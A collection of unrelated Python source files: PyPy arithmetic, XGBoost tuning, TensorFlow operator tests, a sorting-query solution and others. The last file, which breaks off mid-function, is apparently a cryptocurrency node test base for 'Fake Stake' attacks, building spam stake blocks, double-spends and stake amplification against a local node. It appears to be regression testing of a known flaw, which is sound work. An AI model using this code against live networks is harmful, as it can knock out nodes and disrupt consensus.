res = a ^ b
return W_SmallLongObject(res)
descr_xor, descr_rxor = _make_descr_binop(_xor, ovf=False)
def _llong_mul_ovf(a, b):
# xxx duplication of the logic from translator/c/src/int.h
longprod = a * b
doubleprod = float(a) * float(b)
doubled_longprod = float(longprod)
# Fast path for normal case: small multiplicands, and no info
# is lost in either method.
if doubled_longprod == doubleprod:
return longprod
# Somebody somewhere lost info. Close enough, or way off? Note
# that a != 0 and b != 0 (else doubled_longprod == doubleprod == 0).
# The difference either is or isn't significant compared to the
# true value (of which doubleprod is a good approximation).
diff = doubled_longprod - doubleprod
absdiff = abs(diff)
absprod = abs(doubleprod)
# absdiff/absprod <= 1/32 iff
# 32 * absdiff <= absprod -- 5 good bits is "close enough"
if 32.0 * absdiff <= absprod:
return longprod
raise OverflowError("integer multiplication")
def _small2long(space, w_small):
return W_LongObject(w_small.asbigint())
def _pow(space, iv, iw, iz):
if iw < 0:
if iz != 0:
raise oefmt(space.w_ValueError,
"pow() 2nd argument cannot be negative when 3rd "
"argument specified")
raise ValueError
temp = iv
ix = r_longlong(1)
while iw > 0:
if iw & 1:
ix = _llong_mul_ovf(ix, temp)
iw >>= 1 # Shift exponent down by 1 bit
if iw == 0:
break
temp = _llong_mul_ovf(temp, temp) # Square the value of temp
if iz:
# If we did a multiplication, perform a modulo
ix %= iz
temp %= iz
if iz:
ix %= iz
return W_SmallLongObject(ix)
|
py | 1a40b3ac659dd1452bc41bfaf6b76afca045c606 | import pickle
import scipy.stats as st
from sklearn.model_selection import RandomizedSearchCV
from sklearn.metrics import auc
from sklearn.model_selection import StratifiedKFold
import xgboost as xgb
from sklearn.model_selection import KFold
from sklearn.metrics import matthews_corrcoef,make_scorer
def train_xgb(X,
y,
mod_number=1,
cv=None,
outfile="model.pickle",
n_iter_search=100,
nfolds=20,
random_state=42):
"""
Train an XGBoost model with hyper parameter optimization.
Parameters
----------
X : matrix
Matrix with all the features, every instance should be coupled to the y-value
y : vector
Vector with the class, every value should be coupled to an x-vector with features
Returns
-------
object
Trained XGBoost model
object
Cross-validation results
"""
xgb_handle = xgb.XGBClassifier()
one_to_left = st.beta(10, 1)
from_zero_positive = st.expon(0, 50)
#Define distributions to sample from for hyper parameter optimization
param_dist = {
"n_estimators": st.randint(25, 150),
"max_depth": st.randint(5, 10),
"learning_rate": st.uniform(0.05, 0.4),
#"colsample_bytree": one_to_left,
"subsample": one_to_left,
"gamma": st.uniform(0, 10),
"reg_alpha": from_zero_positive,
"min_child_weight": from_zero_positive,
}
if not cv: cv = KFold(n_splits=nfolds, shuffle=True,random_state=random_state)
mcc = make_scorer(matthews_corrcoef)
random_search = RandomizedSearchCV(xgb_handle, param_distributions=param_dist,
n_iter=n_iter_search,verbose=10,scoring="roc_auc",
n_jobs=1,refit=True,cv=cv)
random_search.fit(X, y)
random_search.feats = X.columns
pickle.dump(random_search,open(outfile,"wb"))
return(random_search.best_score_) |
py | 1a40b453ac2ed4f0ff09b2ec05b2f2c0390072df | from typing import Dict
from server.packets.packet import Packet
class PlayerDiedPacket(Packet):
def __init__(self, player_id: str):
self.player_id = player_id
def encode(self) -> Dict:
packet = super().encode()
packet['player_id'] = self.player_id
return packet
@staticmethod
def decode(data: Dict):
return PlayerDiedPacket(
player_id=data['player_id']
)
@staticmethod
def get_type() -> str:
return "player_died"
|
py | 1a40b4659a3d039f4c459fedb598b2ce6e1db1af | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2016 - Twitter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''context.py: module for defining context'''
from abc import abstractmethod
class Context(object):
"""Context is the information available at runtime for operators like transform.
It contains basic things like config, runtime information like task,
the stream that it is operating on, ProcessState, etc.
"""
@abstractmethod
def get_task_id(self):
"""Fetches the task id of the current instance of the operator
"""
pass
@abstractmethod
def get_config(self):
"""Fetches the config of the computation
"""
pass
@abstractmethod
def get_stream_name(self):
"""Fetches the stream name that we are operating on
"""
pass
@abstractmethod
def get_num_partitions(self):
"""Fetches the number of partitions of the stream we are operating on
"""
pass
def get_partition_index(self):
"""Fetches the partition of the stream that we are operating on
"""
pass
@abstractmethod
def get_state(self):
"""The state where components can store any of their local state
"""
pass
@abstractmethod
def emit(self, values):
"""Emits the values in the output stream
"""
pass
|
py | 1a40b5658c415a53d51bacd47769b719b9e59e90 | # Problem statement: Consider an array of integers. We perform queries of the following type on :
# Sort all the elements in the subsegment .
# Given , can you find and print the value at index (where ) after performing queries?
import sys
##### Read Data
dat = [x.split() for x in sys.stdin.readlines()]
N = int(dat[0][0])
Q = int(dat[0][1])
k = int(dat[0][2])
a = list(map(int, dat[1]))
q = [list(map(int, x)) for x in dat[2:len(dat)]]
##### Process Queries
b = sorted(a)
lmin, rmax, pmax, qmin = (N-1), 0, 0, (N-1)
pmin, qmax, flag = (N-1), 0, 1
count, span_q, ladder, revlad = [], 0, 0, 0
if Q >= 2:
ladder = all(q[i+1][0] > q[i][0] for i in range(Q-1))
revlad = all(q[i+1][1] < q[i][1] for i in range(Q-1))
if a != b and ladder < 1 and revlad < 1:
for i in range(Q):
l, r = q[i][0], q[i][1]
if (r-l) > (rmax-lmin):
lmin, rmax = l, r
if l < pmin:
pmin, pmax = l, r
elif l == pmin and pmax < r:
pmax = r
if r > qmax:
qmin, qmax = l, r
elif r == qmax and qmin > l:
qmin = l
for i in range(Q):
l, r = q[i][0], q[i][1]
if l > lmin and r < rmax: continue
if l > pmin and r < pmax: continue
if l > qmin and r < qmax: continue
if i < (Q-1):
if l >= q[i+1][0] and r <= q[i+1][1]:
continue
if i > 0:
if l >= q[i-flag][0] and r <= q[i-flag][1]:
flag += 1
continue
else:
flag = 1
count += [i]
span_q += r-l+1
# Perform Queries
if ladder > 0:
l, r, Qu = q[0][0], q[0][1], int((k+5)/5)
a[l:r+1] = sorted(a[l:r+1])
for i in range(1, Q):
l, r, r0, m, sig = q[i][0], q[i][1], q[i-1][1], 0, 0
if l > r0 or (r-r0) > 0.1*(r0-l):
a[l:r+1] = sorted(a[l:r+1])
continue
if k < l: break
count = list(range(r0+1, r+1))
for j in range(len(count)):
p, new_A = count[j], a[count[j]]
l, r0 = q[i][0], q[i-1][1]
if a[l] >= new_A:
del(a[p]); a[l:l] = [new_A]; continue
elif a[r0+j-1] <= new_A:
del(a[p]); a[r0+j:r0+j] = [new_A]; continue
while sig < 1:
m = int((l+r0)/2)
if a[m] > new_A:
r0 = m
elif a[m+1] < new_A:
l = m+1
else:
del(a[p]); a[m+1:m+1] = [new_A]
sig = 1
elif revlad > 0:
l, r, Qu = q[0][0], q[0][1], int((k+5)/5)
a[l:r+1] = sorted(a[l:r+1])
for i in range(1, Q):
l, r, l0, m, sig = q[i][0], q[i][1], q[i-1][0], 0, 0
if k > r: break
if r < l0:
a[l:r+1] = sorted(a[l:r+1]); continue
count = list(range(l, l0))
for j in range(len(count)):
p, new_A = count[j], a[count[j]]
if a[l0] >= new_A:
del(a[p]); a[l0:l0] = [new_A]; continue
elif a[r] <= new_A:
del(a[p]); a[r:r] = [new_A]; continue
while sig < 1:
m = int((l0+r)/2)
if a[m] > new_A:
r = m
elif a[m+1] < new_A:
l0 = m+1
else:
del(a[p]); a[m+1:m+1] = [new_A]
sig = 1
elif span_q < 1e9 and a != b:
for i in count:
l, r = q[i][0], q[i][1]
a[l:(r+1)] = sorted(a[l:(r+1)])
else:
a[pmin:qmax+1] = sorted(a[pmin:qmax+1])
print(a[k])
|
py | 1a40b5ca3baf70bb4f02faf632365f286d73e2cf | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import test_util
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_addition
from tensorflow.python.platform import test
linalg = linalg_lib
rng = np.random.RandomState(0)
add_operators = linear_operator_addition.add_operators
# pylint: disable=unused-argument
class _BadAdder(linear_operator_addition._Adder):
"""Adder that will fail if used."""
def can_add(self, op1, op2):
raise AssertionError("BadAdder.can_add called!")
def _add(self, op1, op2, operator_name, hints):
raise AssertionError("This line should not be reached")
# pylint: enable=unused-argument
class LinearOperatorAdditionCorrectnessTest(test.TestCase):
"""Tests correctness of addition with combinations of a few Adders.
Tests here are done with the _DEFAULT_ADDITION_TIERS, which means
add_operators should reduce all operators resulting in one single operator.
This shows that we are able to correctly combine adders using the tiered
system. All Adders should be tested separately, and there is no need to test
every Adder within this class.
"""
def test_one_operator_is_returned_unchanged(self):
op_a = linalg.LinearOperatorDiag([1., 1.])
op_sum = add_operators([op_a])
self.assertEqual(1, len(op_sum))
self.assertIs(op_sum[0], op_a)
def test_at_least_one_operators_required(self):
with self.assertRaisesRegex(ValueError, "must contain at least one"):
add_operators([])
def test_attempting_to_add_numbers_raises(self):
with self.assertRaisesRegex(TypeError, "contain only LinearOperator"):
add_operators([1, 2])
@test_util.run_deprecated_v1
def test_two_diag_operators(self):
op_a = linalg.LinearOperatorDiag(
[1., 1.], is_positive_definite=True, name="A")
op_b = linalg.LinearOperatorDiag(
[2., 2.], is_positive_definite=True, name="B")
with self.cached_session():
op_sum = add_operators([op_a, op_b])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorDiag)
self.assertAllClose([[3., 0.], [0., 3.]], op.to_dense())
# Adding positive definite operators produces positive def.
self.assertTrue(op.is_positive_definite)
# Real diagonal ==> self-adjoint.
self.assertTrue(op.is_self_adjoint)
# Positive definite ==> non-singular
self.assertTrue(op.is_non_singular)
# Enforce particular name for this simple case
self.assertEqual("Add/B__A/", op.name)
@test_util.run_deprecated_v1
def test_three_diag_operators(self):
op1 = linalg.LinearOperatorDiag(
[1., 1.], is_positive_definite=True, name="op1")
op2 = linalg.LinearOperatorDiag(
[2., 2.], is_positive_definite=True, name="op2")
op3 = linalg.LinearOperatorDiag(
[3., 3.], is_positive_definite=True, name="op3")
with self.cached_session():
op_sum = add_operators([op1, op2, op3])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertTrue(isinstance(op, linalg_lib.LinearOperatorDiag))
self.assertAllClose([[6., 0.], [0., 6.]], op.to_dense())
# Adding positive definite operators produces positive def.
self.assertTrue(op.is_positive_definite)
# Real diagonal ==> self-adjoint.
self.assertTrue(op.is_self_adjoint)
# Positive definite ==> non-singular
self.assertTrue(op.is_non_singular)
@test_util.run_deprecated_v1
def test_diag_tril_diag(self):
op1 = linalg.LinearOperatorDiag(
[1., 1.], is_non_singular=True, name="diag_a")
op2 = linalg.LinearOperatorLowerTriangular(
[[2., 0.], [0., 2.]],
is_self_adjoint=True,
is_non_singular=True,
name="tril")
op3 = linalg.LinearOperatorDiag(
[3., 3.], is_non_singular=True, name="diag_b")
with self.cached_session():
op_sum = add_operators([op1, op2, op3])
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorLowerTriangular)
self.assertAllClose([[6., 0.], [0., 6.]], op.to_dense())
# The diag operators will be self-adjoint (because real and diagonal).
# The TriL operator has the self-adjoint hint set.
self.assertTrue(op.is_self_adjoint)
# Even though op1/2/3 are non-singular, this does not imply op is.
# Since no custom hint was provided, we default to None (unknown).
self.assertEqual(None, op.is_non_singular)
@test_util.run_deprecated_v1
def test_matrix_diag_tril_diag_uses_custom_name(self):
op0 = linalg.LinearOperatorFullMatrix(
[[-1., -1.], [-1., -1.]], name="matrix")
op1 = linalg.LinearOperatorDiag([1., 1.], name="diag_a")
op2 = linalg.LinearOperatorLowerTriangular(
[[2., 0.], [1.5, 2.]], name="tril")
op3 = linalg.LinearOperatorDiag([3., 3.], name="diag_b")
with self.cached_session():
op_sum = add_operators([op0, op1, op2, op3], operator_name="my_operator")
self.assertEqual(1, len(op_sum))
op = op_sum[0]
self.assertIsInstance(op, linalg_lib.LinearOperatorFullMatrix)
self.assertAllClose([[5., -1.], [0.5, 5.]], op.to_dense())
self.assertEqual("my_operator", op.name)
def test_incompatible_domain_dimensions_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(2, 4))
with self.assertRaisesRegex(ValueError, "must.*same `domain_dimension`"):
add_operators([op1, op2])
def test_incompatible_range_dimensions_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(3, 3))
with self.assertRaisesRegex(ValueError, "must.*same `range_dimension`"):
add_operators([op1, op2])
def test_non_broadcastable_batch_shape_raises(self):
op1 = linalg.LinearOperatorFullMatrix(rng.rand(2, 3, 3))
op2 = linalg.LinearOperatorDiag(rng.rand(4, 3, 3))
with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
add_operators([op1, op2])
class LinearOperatorOrderOfAdditionTest(test.TestCase):
"""Test that the order of addition is done as specified by tiers."""
def test_tier_0_additions_done_in_tier_0(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
diag3 = linalg.LinearOperatorDiag([1.])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
]
# Should not raise since all were added in tier 0, and tier 1 (with the
# _BadAdder) was never reached.
op_sum = add_operators([diag1, diag2, diag3], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorDiag)
def test_tier_1_additions_done_by_tier_1(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[linear_operator_addition._AddAndReturnTriL()],
[_BadAdder()],
]
# Should not raise since all were added by tier 1, and the
# _BadAdder) was never reached.
op_sum = add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorLowerTriangular)
def test_tier_1_additions_done_by_tier_1_with_order_flipped(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnTriL()],
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
]
# Tier 0 could convert to TriL, and this converted everything to TriL,
# including the Diags.
# Tier 1 was never used.
# Tier 2 was never used (therefore, _BadAdder didn't raise).
op_sum = add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
self.assertEqual(1, len(op_sum))
self.assertIsInstance(op_sum[0], linalg.LinearOperatorLowerTriangular)
@test_util.run_deprecated_v1
def test_cannot_add_everything_so_return_more_than_one_operator(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([2.])
tril5 = linalg.LinearOperatorLowerTriangular([[5.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
]
# Tier 0 (the only tier) can only convert to Diag, so it combines the two
# diags, but the TriL is unchanged.
# Result should contain two operators, one Diag, one TriL.
op_sum = add_operators([diag1, diag2, tril5], addition_tiers=addition_tiers)
self.assertEqual(2, len(op_sum))
found_diag = False
found_tril = False
with self.cached_session():
for op in op_sum:
if isinstance(op, linalg.LinearOperatorDiag):
found_diag = True
self.assertAllClose([[3.]], op.to_dense())
if isinstance(op, linalg.LinearOperatorLowerTriangular):
found_tril = True
self.assertAllClose([[5.]], op.to_dense())
self.assertTrue(found_diag and found_tril)
def test_intermediate_tier_is_not_skipped(self):
diag1 = linalg.LinearOperatorDiag([1.])
diag2 = linalg.LinearOperatorDiag([1.])
tril = linalg.LinearOperatorLowerTriangular([[1.]])
addition_tiers = [
[linear_operator_addition._AddAndReturnDiag()],
[_BadAdder()],
[linear_operator_addition._AddAndReturnTriL()],
]
# tril cannot be added in tier 0, and the intermediate tier 1 with the
# BadAdder will catch it and raise.
with self.assertRaisesRegex(AssertionError, "BadAdder.can_add called"):
add_operators([diag1, diag2, tril], addition_tiers=addition_tiers)
class AddAndReturnScaledIdentityTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnScaledIdentity()
@test_util.run_deprecated_v1
def test_identity_plus_identity(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2)
id2 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_identity_plus_scaled_identity(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
id2 = linalg.LinearOperatorScaledIdentity(num_rows=2, multiplier=2.2)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(3.2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_scaled_identity_plus_scaled_identity(self):
id1 = linalg.LinearOperatorScaledIdentity(
num_rows=2, multiplier=[2.2, 2.2, 2.2])
id2 = linalg.LinearOperatorScaledIdentity(num_rows=2, multiplier=-1.0)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorScaledIdentity)
with self.cached_session():
self.assertAllClose(1.2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnDiagTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnDiag()
@test_util.run_deprecated_v1
def test_identity_plus_identity_returns_diag(self):
id1 = linalg.LinearOperatorIdentity(num_rows=2)
id2 = linalg.LinearOperatorIdentity(num_rows=2, batch_shape=[3])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(id1, id2))
operator = self._adder.add(id1, id2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorDiag)
with self.cached_session():
self.assertAllClose(2 * linalg_ops.eye(num_rows=2, batch_shape=[3]),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
@test_util.run_deprecated_v1
def test_diag_plus_diag(self):
diag1 = rng.rand(2, 3, 4)
diag2 = rng.rand(4)
op1 = linalg.LinearOperatorDiag(diag1)
op2 = linalg.LinearOperatorDiag(diag2)
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(op1, op2))
operator = self._adder.add(op1, op2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorDiag)
with self.cached_session():
self.assertAllClose(
linalg.LinearOperatorDiag(diag1 + diag2).to_dense(),
operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnTriLTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnTriL()
@test_util.run_deprecated_v1
def test_diag_plus_tril(self):
diag = linalg.LinearOperatorDiag([1., 2.])
tril = linalg.LinearOperatorLowerTriangular([[10., 0.], [30., 0.]])
hints = linear_operator_addition._Hints(
is_positive_definite=True, is_non_singular=True)
self.assertTrue(self._adder.can_add(diag, diag))
self.assertTrue(self._adder.can_add(diag, tril))
operator = self._adder.add(diag, tril, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorLowerTriangular)
with self.cached_session():
self.assertAllClose([[11., 0.], [30., 2.]], operator.to_dense())
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
class AddAndReturnMatrixTest(test.TestCase):
def setUp(self):
self._adder = linear_operator_addition._AddAndReturnMatrix()
@test_util.run_deprecated_v1
def test_diag_plus_diag(self):
diag1 = linalg.LinearOperatorDiag([1., 2.])
diag2 = linalg.LinearOperatorDiag([-1., 3.])
hints = linear_operator_addition._Hints(
is_positive_definite=False, is_non_singular=False)
self.assertTrue(self._adder.can_add(diag1, diag2))
operator = self._adder.add(diag1, diag2, "my_operator", hints)
self.assertIsInstance(operator, linalg.LinearOperatorFullMatrix)
with self.cached_session():
self.assertAllClose([[0., 0.], [0., 5.]], operator.to_dense())
self.assertFalse(operator.is_positive_definite)
self.assertFalse(operator.is_non_singular)
self.assertEqual("my_operator", operator.name)
if __name__ == "__main__":
test.main()
|
py | 1a40b7f64814cbd6b122b234700dde5335e7e97c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from io import BytesIO
from struct import pack
from random import randint, choice
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import create_coinbase, create_block
from test_framework.key import CECKey
from test_framework.messages import CTransaction, CTxOut, CTxIn, COIN, msg_block
from test_framework.mininode import network_thread_start
from test_framework.test_framework import BitcoinTestFramework
from test_framework.script import CScript, OP_CHECKSIG
from test_framework.util import hash256, bytes_to_hex_str, hex_str_to_bytes, connect_nodes_bi, p2p_port
from .util import TestNode, create_transaction, utxo_to_stakingPrevOuts, dir_size
''' -------------------------------------------------------------------------
StreamitCoin_FakeStakeTest CLASS ----------------------------------------------------
General Test Class to be extended by individual tests for each attack test
'''
class StreamitCoin_FakeStakeTest(BitcoinTestFramework):
def set_test_params(self):
''' Setup test environment
:param:
:return:
'''
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-staking=1', '-debug=net']]*self.num_nodes
def setup_network(self):
''' Can't rely on syncing all the nodes when staking=1
:param:
:return:
'''
self.setup_nodes()
for i in range(self.num_nodes - 1):
for j in range(i+1, self.num_nodes):
connect_nodes_bi(self.nodes, i, j)
def init_test(self):
''' Initializes test parameters
:param:
:return:
'''
self.log.info("\n\n*** Starting %s ***\n------------------------\n%s\n", self.__class__.__name__, self.description)
# Global Test parameters (override in run_test)
self.DEFAULT_FEE = 0.1
# Spam blocks to send in current test
self.NUM_BLOCKS = 30
# Setup the p2p connections and start up the network thread.
self.test_nodes = []
for i in range(self.num_nodes):
self.test_nodes.append(TestNode())
self.test_nodes[i].peer_connect('127.0.0.1', p2p_port(i))
network_thread_start() # Start up network handling in another thread
self.node = self.nodes[0]
# Let the test nodes get in sync
for i in range(self.num_nodes):
self.test_nodes[i].wait_for_verack()
def run_test(self):
''' Performs the attack of this test - run init_test first.
:param:
:return:
'''
self.description = ""
self.init_test()
return
def create_spam_block(self, hashPrevBlock, stakingPrevOuts, height, fStakeDoubleSpent=False, fZPoS=False, spendingPrevOuts={}):
''' creates a block to spam the network with
:param hashPrevBlock: (hex string) hash of previous block
stakingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints (to be used as staking inputs) to amount, block_time, nStakeModifier, hashStake
height: (int) block height
fStakeDoubleSpent: (bool) spend the coinstake input inside the block
fZPoS: (bool) stake the block with zerocoin
spendingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints (to be used as tx inputs) to amount, block_time, nStakeModifier, hashStake
:return block: (CBlock) generated block
'''
self.log.info("Creating Spam Block")
# If not given inputs to create spam txes, use a copy of the staking inputs
if len(spendingPrevOuts) == 0:
spendingPrevOuts = dict(stakingPrevOuts)
# Get current time
current_time = int(time.time())
nTime = current_time & 0xfffffff0
# Create coinbase TX
# Even if PoS blocks have empty coinbase vout, the height is required for the vin script
coinbase = create_coinbase(height)
coinbase.vout[0].nValue = 0
coinbase.vout[0].scriptPubKey = b""
coinbase.nTime = nTime
coinbase.rehash()
# Create Block with coinbase
block = create_block(int(hashPrevBlock, 16), coinbase, nTime)
# Find valid kernel hash - Create a new private key used for block signing.
if not block.solve_stake(stakingPrevOuts):
raise Exception("Not able to solve for any prev_outpoint")
self.log.info("Stake found. Signing block...")
# Sign coinstake TX and add it to the block
signed_stake_tx = self.sign_stake_tx(block, stakingPrevOuts[block.prevoutStake][0], fZPoS)
block.vtx.append(signed_stake_tx)
# Remove coinstake input prevout unless we want to try double spending in the same block.
# Skip for zPoS as the spendingPrevouts are just regular UTXOs
if not fZPoS and not fStakeDoubleSpent:
del spendingPrevOuts[block.prevoutStake]
# remove a random prevout from the list
# (to randomize block creation if the same height is picked two times)
del spendingPrevOuts[choice(list(spendingPrevOuts))]
# Create spam for the block. Sign the spendingPrevouts
self.log.info("Creating spam TXes...")
for outPoint in spendingPrevOuts:
value_out = int(spendingPrevOuts[outPoint][0] - self.DEFAULT_FEE * COIN)
tx = create_transaction(outPoint, b"", value_out, nTime, scriptPubKey=CScript([self.block_sig_key.get_pubkey(), OP_CHECKSIG]))
# sign txes
signed_tx_hex = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
signed_tx = CTransaction()
signed_tx.deserialize(BytesIO(hex_str_to_bytes(signed_tx_hex)))
block.vtx.append(signed_tx)
# Get correct MerkleRoot and rehash block
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
# Sign block with coinstake key and return it
block.sign_block(self.block_sig_key)
return block
def spend_utxo(self, utxo, address_list):
''' spend amount from previously unspent output to a provided address
:param utxo: (JSON) returned from listunspent used as input
addresslist: (string) destination address
:return: txhash: (string) tx hash if successful, empty string otherwise
'''
try:
inputs = [{"txid":utxo["txid"], "vout":utxo["vout"]}]
out_amount = (float(utxo["amount"]) - self.DEFAULT_FEE)/len(address_list)
outputs = {}
for address in address_list:
outputs[address] = out_amount
spendingTx = self.node.createrawtransaction(inputs, outputs)
spendingTx_signed = self.node.signrawtransaction(spendingTx)
if spendingTx_signed["complete"]:
txhash = self.node.sendrawtransaction(spendingTx_signed["hex"])
return txhash
else:
self.log.warning("Error: %s" % str(spendingTx_signed["errors"]))
return ""
except JSONRPCException as e:
self.log.error("JSONRPCException: %s" % str(e))
return ""
def spend_utxos(self, utxo_list, address_list = []):
''' spend utxos to provided list of addresses or 10 new generate ones.
:param utxo_list: (JSON list) returned from listunspent used as input
address_list: (string list) [optional] recipient StreamitCoin addresses. if not set,
10 new addresses will be generated from the wallet for each tx.
:return: txHashes (string list) tx hashes
'''
txHashes = []
# If not given, get 10 new addresses from self.node wallet
if address_list == []:
for i in range(10):
address_list.append(self.node.getnewaddress())
for utxo in utxo_list:
try:
# spend current utxo to provided addresses
txHash = self.spend_utxo(utxo, address_list)
if txHash != "":
txHashes.append(txHash)
except JSONRPCException as e:
self.log.error("JSONRPCException: %s" % str(e))
continue
return txHashes
def stake_amplification_step(self, utxo_list, address_list = []):
''' spends a list of utxos providing the list of new outputs
:param utxo_list: (JSON list) returned from listunspent used as input
address_list: (string list) [optional] recipient StreamitCoin addresses.
:return: new_utxos: (JSON list) list of new (valid) inputs after the spends
'''
self.log.info("--> Stake Amplification step started with %d UTXOs", len(utxo_list))
txHashes = self.spend_utxos(utxo_list, address_list)
num_of_txes = len(txHashes)
new_utxos = []
if num_of_txes> 0:
self.log.info("Created %d transactions...Mining 2 blocks to include them..." % num_of_txes)
self.node.generate(2)
time.sleep(2)
new_utxos = self.node.listunspent()
self.log.info("Amplification step produced %d new \"Fake Stake\" inputs:" % len(new_utxos))
return new_utxos
def stake_amplification(self, utxo_list, iterations, address_list = []):
''' performs the "stake amplification" which gives higher chances at finding fake stakes
:param utxo_list: (JSON list) returned from listunspent used as input
iterations: (int) amount of stake amplification steps to perform
address_list: (string list) [optional] recipient StreamitCoin addresses.
:return: all_inputs: (JSON list) list of all spent inputs
'''
self.log.info("** Stake Amplification started with %d UTXOs", len(utxo_list))
valid_inputs = utxo_list
all_inputs = []
for i in range(iterations):
all_inputs = all_inputs + valid_inputs
old_inputs = valid_inputs
valid_inputs = self.stake_amplification_step(old_inputs, address_list)
self.log.info("** Stake Amplification ended with %d \"fake\" UTXOs", len(all_inputs))
return all_inputs
def sign_stake_tx(self, block, stake_in_value, fZPoS=False):
''' signs a coinstake transaction
:param block: (CBlock) block with stake to sign
stake_in_value: (int) staked amount
fZPoS: (bool) zerocoin stake
:return: stake_tx_signed: (CTransaction) signed tx
'''
self.block_sig_key = CECKey()
if fZPoS:
self.log.info("Signing zPoS stake...")
# Create raw zerocoin stake TX (signed)
